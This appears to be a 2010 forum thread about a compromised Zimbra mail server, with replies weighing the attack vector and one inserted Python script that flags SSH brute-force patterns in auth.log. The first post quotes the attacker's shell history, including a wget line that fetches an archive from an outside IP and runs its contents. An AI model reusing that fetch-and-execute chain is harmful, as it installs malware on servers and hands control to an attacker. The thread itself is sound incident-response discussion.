
Thread: Zimbra Server compromised

  1. #1
    Join Date: Dec 2009 | Posts: 29

    Zimbra Server compromised

    Hi - a zimbra box I keep an eye on was compromised on 12/7 - I noticed I stopped receiving automated emails from the backup script.

    This was in the .bash_history

    id
    uname -a
    ls -a
    cat .bash_history
    cd /tmp
    ls -a
    wget eff-tee-pee://user:123456@65.38.182.79/autorun.tgz;tar -xzvf autorun.tgz;rm -rf autorun.tgz;cd .m;cd conect3;chmod +x *;./start lfg
    cd ..
    ls -a
    cd ..
    rm -rf .m
    ps x
    kill -9 12150
    exit

    So the zmback cron was removed. It's an Ubuntu 8.04 server, kept up to date with apt. Apart from Zimbra, the only other thing installed is Webmin, which is locked down to being only available to 2 IP addresses. The router only has open ports for the essential Zimbra services (secure IMAP, SSL SMTP etc.).

    Any advice please? My desktop AVG reports the file as being infected with Linux/Mech.A -

    I've altered the URL shown so as to stop people clicking on it.

    sem

  2. #2
    Join Date: May 2006 | Location: England | Posts: 927

    Can you rule out physical access?

  3. #3
    Join Date: Dec 2009 | Posts: 29

    Quote Originally Posted by Dirk View Post
    Can you rule out physical access?
    Not 100% to be honest. The server is in a server room that is normally locked. I'm the only one that knows the root password.

    Up until this morning, other than the aforementioned Zimbra ports and SSH, only Webmin was available - I've since closed these ports off too.

  4. #4
    Join Date: Sep 2005 | Location: Sydney, Australia | Posts: 291

    Odds on, you had a weak password on an account and it was a simple brute force SSH attack.
    http://www.solutionsfirst.com.au/hosting/zimbra/
    Australia's premier Zimbra Hosting Partner
    Resellers wanted!

  5. #5
    Join Date: May 2006 | Location: England | Posts: 927

    Are there any signs of bruteforcing the SSH password?
    Working out how the attack was performed is hard unless you have experience of this in the past; I'd lean towards thinking that it's not Zimbra itself that's been breached though.

    I'm not aware of any remote exploit or attack that can be performed against ports 25, 443 and 993 open to Zimbra.
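    Post #5 asks whether there are signs of SSH brute forcing. As an added example (not code from this thread or from Zimbra), the Python script below parses sshd entries in the Ubuntu-style /var/log/auth.log format, counts failed logins per source address, and flags any successful login that follows a burst of failures from the same address, which is the pattern a password-guessing attack leaves behind. The log lines are constructed and use documentation address ranges; the threshold of five failures is an assumption.

```python
import re

# Constructed sample lines in the Ubuntu sshd auth.log format (not taken from the thread).
SAMPLE_AUTH_LOG = """\
Jul  7 02:11:03 zimbra sshd[12001]: Failed password for invalid user admin from 203.0.113.9 port 51022 ssh2
Jul  7 02:11:05 zimbra sshd[12003]: Failed password for invalid user oracle from 203.0.113.9 port 51030 ssh2
Jul  7 02:11:07 zimbra sshd[12005]: Failed password for root from 203.0.113.9 port 51041 ssh2
Jul  7 02:11:09 zimbra sshd[12007]: Failed password for root from 203.0.113.9 port 51052 ssh2
Jul  7 02:11:12 zimbra sshd[12009]: Failed password for root from 203.0.113.9 port 51060 ssh2
Jul  7 02:11:14 zimbra sshd[12011]: Accepted password for root from 203.0.113.9 port 51071 ssh2
Jul  7 08:30:41 zimbra sshd[12150]: Accepted publickey for sem from 192.0.2.20 port 40012 ssh2
Jul  7 08:31:02 zimbra sshd[12160]: Failed password for sem from 192.0.2.20 port 40020 ssh2
"""

# Matches both "Failed password for invalid user X from IP" and "Accepted publickey for X from IP".
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)


def analyse_auth_log(text, threshold=5):
    """Return (failures_per_ip, suspicious_logins).

    failures_per_ip maps a source address to its count of failed logins so far.
    suspicious_logins lists (ip, user, method) for every accepted login that came
    after at least `threshold` failures from the same address.
    """
    failures = {}
    suspicious_logins = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # not an sshd login result line
        ip = m.group("ip")
        if m.group("result") == "Failed":
            failures[ip] = failures.get(ip, 0) + 1
        elif failures.get(ip, 0) >= threshold:
            suspicious_logins.append((ip, m.group("user"), m.group("method")))
    return failures, suspicious_logins


if __name__ == "__main__":
    counts, flagged = analyse_auth_log(SAMPLE_AUTH_LOG)
    for ip, n in sorted(counts.items(), key=lambda kv: -kv[1]):
        print(f"{ip}: {n} failed login(s)")
    for ip, user, method in flagged:
        print(f"SUSPICIOUS: {method} login as {user} from {ip} after a burst of failures")
```

    On a live box, run it over the real file (for example `python3 script.py < /var/log/auth.log` after changing the script to read stdin); a key-based login with no prior failures, as in the second address above, is not flagged.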

  6. #6
    Join Date: Dec 2009 | Posts: 29

    Quote Originally Posted by dave_kempe View Post
    Odds on, you had a weak password on an account and it was a simple brute force SSH attack.
    Unlikely - I'm not an expert, but port 22 on the router is port forwarded to another Linux machine; you then open an SSH session to the Zimbra box. I've checked this one and it's not been compromised at all. That's the only SSH route to the Zimbra box.

  7. #7
    Join Date: Dec 2009 | Posts: 29

    Quote Originally Posted by Dirk View Post
    Are there any signs of bruteforcing the SSH password?
    Working out how the attack was performed is hard unless you have experience of this in the past; I'd lean towards thinking that it's not Zimbra itself that's been breached though.

    I'm not aware of any remote exploit or attack that can be performed against ports 25, 443 and 993 open to Zimbra.
    Not on the Zimbra server - from outside the network, you can't directly SSH to it.

  8. #8
    Join Date: Sep 2006 | Location: 477 Congress Street | Portland, ME 04101 | Posts: 1,374

    Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

    If you also had Webmin open on your Desktop and went to another web site with an infected ad, that could also be the attack vector. See Webmin for example.

    If the root account on your Zimbra server has been compromised, just changing the root password is likely not sufficient for eliminating the exposure.

    I'd strongly suggest engaging a professional security firm for an assessment.

    Hope that helps,
    Mark

  9. #9
    Join Date: Dec 2009 | Posts: 29

    Quote Originally Posted by LMStone View Post
    Are you saying Webmin was exposed to the public Internet? That alone provides a pretty broad attack surface...

    Hope that helps,
    Mark
    Hi - thanks for the advice. I've used Webmin to varying extents for years - the version on the Zimbra box is the latest. It's not really used and doesn't have 100% access from the Internet - it was also not operating on the standard Webmin port.

    I've disabled access to the root account and changed the password on the sole user account. I've checked again and the only thing compromised was the cron job - it looks like the virus was unable to propagate itself.

    I'm getting someone to take a look at it tonight though.
    Last edited by sem; 07-22-2010 at 08:45 AM.

  10. #10
    Join Date: Dec 2009 | Posts: 29

    As an update, I've shut off all access from the Internet beyond what Zimbra requires to handle mail. Vigilance ensues.
